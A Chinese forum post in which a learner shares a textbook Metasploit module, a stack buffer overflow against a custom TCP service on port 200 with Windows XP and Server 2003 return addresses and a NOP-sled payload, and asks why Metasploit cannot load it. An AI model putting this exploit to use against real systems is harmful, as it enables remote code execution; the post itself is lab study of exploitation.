照着exploit的书上面写的,甚至把信息的部分都删了,结果metasploit还是找不出这个脚本。不知道哪里弄错了,在kali下连接win7的服务器程序。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 | class metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Payload' =>{
'Space' => 1400,
'BadChars'=> "\x00\xff",
},
'Platform' => 'win',
'Targets' =>
[
['Windows xp sp3en',
{'Ret' => 0x7c87441c ,'Offset'=>504} ],
['Windows 2003 Server R2 SP2',
{'Ret'=> 0x71c02b67 ,'Offset' =>504} ],
],
'DefaultTarget' => 0,
'Privileged '=> false
)
)
register_option([Opt::RPORT(200)],self.class)
end
def exploit
connect
junk = make_nops(target['Offset'])
sploit = junk + [target.ret].pack('V') + make_nops(50) + payload.encoded
sock.put(sploit)
handler
disconnect
end
end
|
我保存的是rb1.rb。
还有就是payload的space和badcode是什么意思。
ip也没有指定, Msf::Exploit::Remote类和Msf::Exploit::Remote::Tcp模块的定义怎么找呢。
byakugan.dll在哪下载呢?
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
